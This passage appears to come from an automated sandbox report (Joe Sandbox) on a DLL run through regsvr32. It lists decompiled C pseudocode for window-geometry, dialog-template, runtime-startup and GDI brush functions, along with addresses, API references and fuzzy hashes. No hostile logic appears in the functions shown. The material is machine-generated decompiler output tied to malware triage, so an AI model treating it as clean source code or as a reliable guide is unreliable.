				struct tagRECT _v60;
				void* _t76;
				int _t78;
				intOrPtr _t83;
				intOrPtr _t102;
				int _t116;
				void* _t124;
				void* _t128;
				intOrPtr _t133;
				void* _t135;
				void* _t139;

				_t135 = __edi;
				_t124 = __ecx;
				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
				_t139 = 2;
				if(_t133 == 0xa) {
					L7:
					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
					L9:
					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
					__eflags = _t78;
					L10:
					if(_t78 < 0) {
						_t78 = 0;
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
					GetWindowRect(GetDesktopWindow(),  &_v44);
					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if(_t83 == 0xa || _t83 == 0xc) {
						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
						if(__eflags != 0) {
							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
							__eflags = _t102;
							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
							 *(_t124 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t149 = _t116;
						if(_t116 != 0) {
							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t124 + 4)) = _a4;
					 *((intOrPtr*)(_t124 + 8)) = _a8;
					return E10030582(_t124, _t149, 0);
				}
				if(_t133 == 0xb) {
					__eflags = _t133 - 0xa;
					if(_t133 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t139 = 0x22;
					if(_t133 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
					}
					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
					goto L10;
				}
			}


















                                                                        0x1003078e
                                                                        0x10030798
                                                                        0x100307a0
                                                                        0x100307a6
                                                                        0x100307a8
                                                                        0x100307b3
                                                                        0x100307b4
                                                                        0x100307d8
                                                                        0x100307d8
                                                                        0x100307e0
                                                                        0x100307e3
                                                                        0x100307e3
                                                                        0x100307e6
                                                                        0x100307e8
                                                                        0x100307ea
                                                                        0x100307ea
                                                                        0x100307f8
                                                                        0x10030809
                                                                        0x1003080f
                                                                        0x1003081e
                                                                        0x1003081f
                                                                        0x10030820
                                                                        0x10030821
                                                                        0x10030823
                                                                        0x1003088a
                                                                        0x10030899
                                                                        0x100308ae
                                                                        0x100308b0
                                                                        0x100308b8
                                                                        0x100308be
                                                                        0x100308be
                                                                        0x100308c1
                                                                        0x100308c7
                                                                        0x100308cd
                                                                        0x100308cd
                                                                        0x1003082a
                                                                        0x10030836
                                                                        0x10030845
                                                                        0x10030854
                                                                        0x1003085a
                                                                        0x1003085c
                                                                        0x10030864
                                                                        0x1003086d
                                                                        0x10030873
                                                                        0x10030879
                                                                        0x10030879
                                                                        0x1003085c
                                                                        0x100308d3
                                                                        0x100308dd
                                                                        0x100308e8
                                                                        0x100308e8
                                                                        0x100307b9
                                                                        0x100307d3
                                                                        0x100307d6
                                                                        0x100307dd
                                                                        0x100307dd
                                                                        0x100307dd
                                                                        0x00000000
                                                                        0x100307dd
                                                                        0x00000000
                                                                        0x100307bb
                                                                        0x100307c0
                                                                        0x100307c1
                                                                        0x100307c8
                                                                        0x100307c8
                                                                        0x100307c8
                                                                        0x100307c3
                                                                        0x100307c3
                                                                        0x100307c3
                                                                        0x100307ce
                                                                        0x00000000
                                                                        0x100307ce

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$IntersectWindow$Desktop
                                                                        • String ID:
                                                                        • API String ID: 123605412-0
                                                                        • Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                        • Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
                                                                        • Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                        • Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10024838 Relevance: 6.1, APIs: 4, Instructions: 115stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
				intOrPtr _v8;
				short _v72;
				signed int _v76;
				signed int _v80;
				void** _v84;
				signed int _v88;
				intOrPtr _t52;
				short* _t65;
				void* _t74;
				short* _t81;
				void* _t86;
				char* _t92;
				signed int _t93;
				signed int* _t95;
				void** _t96;
				signed int _t101;
				signed int _t103;
				void* _t106;

				_t52 =  *0x1004c470; // 0x303bb91f
				_v8 = _t52;
				_v84 = __ecx;
				if(__ecx[1] != 0) {
					_t95 = GlobalLock( *__ecx);
					_v80 = 0 | _t95[0] == 0x0000ffff;
					_v76 = E100246AB(_t95);
					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
					_v88 = _t101;
					if(_v80 == 0) {
						 *_t95 =  *_t95 | 0x00000040;
					} else {
						_t95[3] = _t95[3] | 0x00000040;
					}
					if(lstrlenA(_a4) < 0x20) {
						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
						_t65 = E1002472A(_t95);
						_t86 = 0;
						_t81 = _t65;
						if(_v76 != 0) {
							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
						}
						_t92 = _a4;
						_t31 = _t81 + 3; // 0x3
						_t33 = _t92 + 3; // 0x3
						_t67 = _t86 + _t31 & 0xfffffffc;
						_t103 = _t81 + _t33 & 0xfffffffc;
						_v76 = _t86 + _t31 & 0xfffffffc;
						if(_v80 == 0) {
							_t93 = _t95[2];
						} else {
							_t93 = _t95[4];
						}
						if(_a4 != _t86 && _t93 > 0) {
							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
							_t106 = _t106 + 0xc;
						}
						 *_t81 = _a8;
						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
						_t96 = _v84;
						_t96[1] = _t96[1] + _t103 - _v76;
						GlobalUnlock( *_t96);
						_t96[2] = _t96[2] & 0x00000000;
						_t74 = 1;
					} else {
						_t74 = 0;
					}
				} else {
					_t74 = 0;
				}
				return E100117AE(_t74, _v8);
			}





















                                                                        0x1002483e
                                                                        0x10024849
                                                                        0x1002484c
                                                                        0x1002484f
                                                                        0x10024862
                                                                        0x10024870
                                                                        0x10024878
                                                                        0x1002488d
                                                                        0x1002488f
                                                                        0x10024892
                                                                        0x1002489a
                                                                        0x10024894
                                                                        0x10024894
                                                                        0x10024894
                                                                        0x100248a9
                                                                        0x100248c9
                                                                        0x100248cc
                                                                        0x100248d2
                                                                        0x100248d7
                                                                        0x100248d9
                                                                        0x100248e5
                                                                        0x100248e5
                                                                        0x100248e9
                                                                        0x100248ec
                                                                        0x100248f0
                                                                        0x100248f4
                                                                        0x100248f7
                                                                        0x100248fe
                                                                        0x10024901
                                                                        0x10024909
                                                                        0x10024903
                                                                        0x10024903
                                                                        0x10024903
                                                                        0x10024910
                                                                        0x10024922
                                                                        0x10024927
                                                                        0x10024927
                                                                        0x10024931
                                                                        0x10024941
                                                                        0x10024946
                                                                        0x10024951
                                                                        0x10024954
                                                                        0x1002495a
                                                                        0x10024960
                                                                        0x100248ab
                                                                        0x100248ab
                                                                        0x100248ab
                                                                        0x10024851
                                                                        0x10024851
                                                                        0x10024851
                                                                        0x1002496d

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalLocklstrlen
                                                                        • String ID:
                                                                        • API String ID: 1144527523-0
                                                                        • Opcode ID: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                        • Instruction ID: afb049e80b1b3f5565d5b3658fd79ee3861b352aa931f7b78d6a2774fdc8a605
                                                                        • Opcode Fuzzy Hash: 43c45d826a3564adc6f5176af8266918bef1cb386d16f858764c52389791046f
                                                                        • Instruction Fuzzy Hash: 9341B632900219EFDB14DFB4D88589EBBB8FF44354B518229E815DB255EF70E995CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001119B Relevance: 6.1, APIs: 4, Instructions: 113threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 75%
                                                                        			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
				void* _v8;
				void* __esi;
				void* __ebp;
				long* _t9;
				long* _t11;
				long _t17;
				signed int _t25;
				long* _t33;
				long* _t36;
				long* _t38;
				long* _t39;
				long _t47;
				long _t50;
				void* _t52;
				long* _t53;
				struct _OSVERSIONINFOA* _t54;
				signed int _t56;
				struct _OSVERSIONINFOA* _t58;

				_t9 = _a8;
				if(_t9 != 1) {
					__eflags = _t9;
					if(_t9 != 0) {
						__eflags = _t9 - 2;
						if(__eflags != 0) {
							__eflags = _t9 - 3;
							if(_t9 == 3) {
								E10015355(0);
							}
							L27:
							_t11 = 1;
							__eflags = 1;
							L28:
							return _t11;
						}
						_push(0x8c);
						_push(1);
						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
						__eflags = _t53;
						if(_t53 == 0) {
							L24:
							_t11 = 0;
							goto L28;
						}
						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
						_push(_t53);
						if(__eflags == 0) {
							E100107C8(__ebx, __edi, _t53, __eflags);
							goto L24;
						}
						E1001518A();
						_t17 = GetCurrentThreadId();
						_t53[1] = _t53[1] | 0xffffffff;
						 *_t53 = _t17;
						goto L27;
					}
					__eflags =  *0x1004f3c8 - _t9; // 0x0
					if(__eflags <= 0) {
						goto L24;
					}
					 *0x1004f3c8 =  *0x1004f3c8 - 1;
					__eflags =  *0x1004f41c - _t9; // 0x1
					if(__eflags == 0) {
						E10011F67();
					}
					E1001634A();
					E1001516D();
					E10013AD4();
					goto L27;
				}
				E10010B20(0x94, __ecx);
				_t54 = _t58;
				_t54->dwOSVersionInfoSize = 0x94;
				if(GetVersionExA(_t54) == 0) {
					goto L24;
				}
				_t47 = _t54->dwPlatformId;
				 *0x1004f3e0 = _t47;
				_t25 = _t54->dwMajorVersion;
				 *0x1004f3ec = _t25;
				_t50 = _t54->dwMinorVersion;
				 *0x1004f3f0 = _t50;
				_t56 = _t54->dwBuildNumber & 0x00007fff;
				 *0x1004f3e4 = _t56;
				if(_t47 != 2) {
					 *0x1004f3e4 = _t56 | 0x00008000;
				}
				 *0x1004f3e8 = (_t25 << 8) + _t50;
				if(E10013A83(1) != 0) {
					if(E10015384() != 0) {
						E1001678D(__eflags);
						 *0x10050cb0 = GetCommandLineA();
						 *0x1004f3cc = E1001666B();
						_t33 = E1001614C();
						__eflags = _t33;
						if(_t33 < 0) {
							L13:
							E1001516D();
							goto L6;
						}
						_t36 = E100165C9();
						__eflags = _t36;
						if(_t36 < 0) {
							L12:
							E1001634A();
							goto L13;
						}
						_t38 = E10016396();
						__eflags = _t38;
						if(_t38 < 0) {
							goto L12;
						}
						_t39 = E10011E29(0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L12;
						}
						 *0x1004f3c8 =  *0x1004f3c8 + 1;
						goto L27;
					}
					L6:
					E10013AD4();
				}
			}





















                                                                        0x1001119e
                                                                        0x100111a5
                                                                        0x1001128b
                                                                        0x1001128d
                                                                        0x100112bb
                                                                        0x100112be
                                                                        0x10011304
                                                                        0x10011307
                                                                        0x1001130b
                                                                        0x10011310
                                                                        0x10011311
                                                                        0x10011313
                                                                        0x10011313
                                                                        0x10011314
                                                                        0x10011319
                                                                        0x10011319
                                                                        0x100112c0
                                                                        0x100112c5
                                                                        0x100112cc
                                                                        0x100112ce
                                                                        0x100112d2
                                                                        0x10011300
                                                                        0x10011300
                                                                        0x00000000
                                                                        0x10011300
                                                                        0x100112e1
                                                                        0x100112e3
                                                                        0x100112e4
                                                                        0x100112fa
                                                                        0x00000000
                                                                        0x100112ff
                                                                        0x100112e6
                                                                        0x100112ec
                                                                        0x100112f2
                                                                        0x100112f6
                                                                        0x00000000
                                                                        0x100112f6
                                                                        0x1001128f
                                                                        0x10011295
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10011297
                                                                        0x1001129d
                                                                        0x100112a3
                                                                        0x100112a5
                                                                        0x100112a5
                                                                        0x100112aa
                                                                        0x100112af
                                                                        0x100112b4
                                                                        0x00000000
                                                                        0x100112b4
                                                                        0x100111b0
                                                                        0x100111b5
                                                                        0x100111b8
                                                                        0x100111c6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100111cc
                                                                        0x100111cf
                                                                        0x100111d5
                                                                        0x100111d8
                                                                        0x100111dd
                                                                        0x100111e0
                                                                        0x100111e9
                                                                        0x100111f2
                                                                        0x100111f8
                                                                        0x10011200
                                                                        0x10011200
                                                                        0x1001120d
                                                                        0x1001121a
                                                                        0x10011227
                                                                        0x10011233
                                                                        0x1001123e
                                                                        0x10011248
                                                                        0x1001124d
                                                                        0x10011252
                                                                        0x10011254
                                                                        0x10011284
                                                                        0x10011284
                                                                        0x00000000
                                                                        0x10011284
                                                                        0x10011256
                                                                        0x1001125b
                                                                        0x1001125d
                                                                        0x1001127f
                                                                        0x1001127f
                                                                        0x00000000
                                                                        0x1001127f
                                                                        0x1001125f
                                                                        0x10011264
                                                                        0x10011266
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001126a
                                                                        0x1001126f
                                                                        0x10011272
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10011274
                                                                        0x00000000
                                                                        0x10011274
                                                                        0x10011229
                                                                        0x10011229
                                                                        0x10011229

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
                                                                        • GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238
                                                                          • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10016687
                                                                          • Part of subcall function 1001666B: GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100166BD
                                                                          • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,10011248), ref: 100166F1
                                                                          • Part of subcall function 1001666B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,10011248,?,?), ref: 10016713
                                                                          • Part of subcall function 1001666B: FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,10011248,?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 1001672C
                                                                          • Part of subcall function 1001382A: __lock.LIBCMT ref: 1001386E
                                                                          • Part of subcall function 1001382A: RtlAllocateHeap.NTDLL(00000008,?,10041E40,00000010,100151C5,00000001,0000008C,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000), ref: 100138AC
                                                                        • FlsSetValue.KERNEL32(00000000,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100112DB
                                                                        • GetCurrentThreadId.KERNEL32 ref: 100112EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$ByteCharMultiWide$AllocateCommandCurrentFreeHeapLineThreadValueVersion__lock
                                                                        • String ID:
                                                                        • API String ID: 770256606-0
                                                                        • Opcode ID: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                        • Instruction ID: a119cf37508875902a7ac88b5959fce435ef45eee062e48075b7e26cf38889a7
                                                                        • Opcode Fuzzy Hash: 0bbb6c4510ef70c4376c2f3441da33c3dbf9baf309990ecdfd17b149b5dc2492
                                                                        • Instruction Fuzzy Hash: 7D31F635904312DBF728DFB08D8669A77E4EF05792F10412EF860CE552EB30EAC08B61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10030582 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E10030582(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __esi;
				void* __ebp;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t83;
				void* _t91;

				_t91 = __eflags;
				_t76 = __ecx;
				_v24 = 1;
				_v20 = 1;
				_push(GetStockObject(0));
				_t83 = E1002934F();
				_v16 = _t83;
				_v8 = E10033F2F(_t83, _t91);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t83;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L6:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L9:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L6;
							}
						}
						_v12 = _v8;
					} else {
					}
				} else {
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				if(( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t95 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E10033FCE( *((intOrPtr*)(_t76 + 0x84)), _t95,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				asm("movsd");
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}


















                                                                        0x10030582
                                                                        0x10030590
                                                                        0x10030592
                                                                        0x10030595
                                                                        0x1003059e
                                                                        0x100305a4
                                                                        0x100305a6
                                                                        0x100305ae
                                                                        0x100305b1
                                                                        0x100305b4
                                                                        0x100305be
                                                                        0x100305c5
                                                                        0x100305c8
                                                                        0x100305dc
                                                                        0x100305e2
                                                                        0x100305e5
                                                                        0x100305e8
                                                                        0x100305ea
                                                                        0x100305f2
                                                                        0x100305f2
                                                                        0x100305f5
                                                                        0x10030602
                                                                        0x100305f7
                                                                        0x100305f7
                                                                        0x100305fb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100305fb
                                                                        0x100305ec
                                                                        0x100305ec
                                                                        0x100305f0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100305f0
                                                                        0x10030608
                                                                        0x100305ca
                                                                        0x100305ca
                                                                        0x100305c0
                                                                        0x100305c0
                                                                        0x1003060e
                                                                        0x1003060f
                                                                        0x10030610
                                                                        0x10030611
                                                                        0x10030617
                                                                        0x10030619
                                                                        0x1003061c
                                                                        0x1003061c
                                                                        0x10030623
                                                                        0x1003062d
                                                                        0x1003062d
                                                                        0x10030633
                                                                        0x10030636
                                                                        0x10030639
                                                                        0x1003063b
                                                                        0x1003063b
                                                                        0x1003065c
                                                                        0x1003066a
                                                                        0x1003066b
                                                                        0x10030671
                                                                        0x10030672
                                                                        0x1003067a
                                                                        0x1003067b
                                                                        0x1003067e
                                                                        0x10030681
                                                                        0x10030686

                                                                        APIs
                                                                        • GetStockObject.GDI32(00000000), ref: 10030598
                                                                          • Part of subcall function 10033F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,100305AE), ref: 10033F73
                                                                          • Part of subcall function 10033F2F: CreatePatternBrush.GDI32(00000000), ref: 10033F80
                                                                          • Part of subcall function 10033F2F: DeleteObject.GDI32(00000000), ref: 10033F8C
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: CreateObject$BitmapBrushDeleteInflatePatternRectStock
                                                                        • String ID:
                                                                        • API String ID: 3923860780-0
                                                                        • Opcode ID: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                        • Instruction ID: 9af8668bb33911b9f969ea6b6b6f254ec0c1e141af5f513437efede38b15d734
                                                                        • Opcode Fuzzy Hash: a91736406a3bc21c34a15b15e2e7e71349b5931477c524aa32b1e52334f80afc
                                                                        • Instruction Fuzzy Hash: BF410371D016199FDF42CFA4C980A9EBBF5EB48351F1142A5E911AB29AD370AE41CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002084F Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E1002084F(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001E0CB( *((intOrPtr*)(_t49 + 0x48)) + 0x3c, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E10006D96( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E10006D96( &_a4)));
								_v8 =  *((intOrPtr*)(E10006D96( &_a4)));
								if((E1002049B(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E10006DAF( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E10006DAF( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1002049B(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                        0x10020852
                                                                        0x10020853
                                                                        0x10020856
                                                                        0x1002085d
                                                                        0x10020863
                                                                        0x10020868
                                                                        0x10020878
                                                                        0x10020891
                                                                        0x10020899
                                                                        0x100208a1
                                                                        0x100208a4
                                                                        0x100208ae
                                                                        0x100208ef
                                                                        0x100208c4
                                                                        0x100208c8
                                                                        0x100208d5
                                                                        0x00000000
                                                                        0x100208d7
                                                                        0x100208d7
                                                                        0x100208dd
                                                                        0x00000000
                                                                        0x1002094a
                                                                        0x1002094a
                                                                        0x1002094a
                                                                        0x00000000
                                                                        0x1002094a
                                                                        0x100208dd
                                                                        0x00000000
                                                                        0x100208d5
                                                                        0x100208fa
                                                                        0x10020904
                                                                        0x10020943
                                                                        0x1002091a
                                                                        0x1002091f
                                                                        0x10020922
                                                                        0x10020937
                                                                        0x10020937
                                                                        0x10020941
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10020924
                                                                        0x10020932
                                                                        0x00000000
                                                                        0x10020934
                                                                        0x10020934
                                                                        0x00000000
                                                                        0x10020934
                                                                        0x10020932
                                                                        0x00000000
                                                                        0x10020922
                                                                        0x1002087a
                                                                        0x10020883
                                                                        0x10020888
                                                                        0x1002088b
                                                                        0x1002094d
                                                                        0x10020956
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002088b
                                                                        0x10020958
                                                                        0x10020958
                                                                        0x10020868
                                                                        0x1002095c

                                                                        APIs
                                                                        Memory Dump Source
